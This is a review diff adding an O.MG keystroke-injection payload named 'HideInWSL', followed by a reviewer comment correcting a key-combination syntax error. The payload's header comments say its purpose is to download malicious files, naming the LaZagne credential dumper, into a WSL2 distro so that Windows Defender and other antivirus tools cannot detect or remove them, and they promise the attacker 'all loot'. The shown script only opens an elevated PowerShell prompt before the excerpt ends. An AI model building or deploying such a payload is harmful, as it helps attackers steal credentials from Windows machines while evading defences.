payloads/library/execution/HideInWSL/payload.txt

```diff
@@ -0,0 +1,49 @@
+REM Title: HideInWSL
+REM Author: mylorik
+REM Description: 
+REM This payload is a POC of downloading a malicious file, like EICAR, while avoiding Windows Defender and 3rd party antivirus solutions without any tampering!
+REM This is done by downloading the file to the WSL2 distro
+REM Target: Windows 11 (Windows 10 1903+)
+REM System: OMG, firmware 3
+REM Details:
+REM While the antivirus cannot detect the downloaded file, it may be detected during Execution of that bad file, but even then it cannot remove the file from WSL2 distro!
+REM In my testing, LaZagne.exe can be downloaded and executed, you will get the loot, the antivirus will detect the execution and kill the process at some point, but you will get all loot and the file will remain in the WSL2 distro                       
+
+
+REM change to your target language
+DUCKY_LANG us
+
+REM adjust DELAY to your system
+
+GUI r
+DELAY 100
+
+REM Open the Powershell as Administrator
+STRING powershell
+CTRL-SHIFT ENTER
```

Comment:
This is a syntax error due to the mixed delimiting characters: Dash and Space
Please change to: CTRL SHIFT ENTER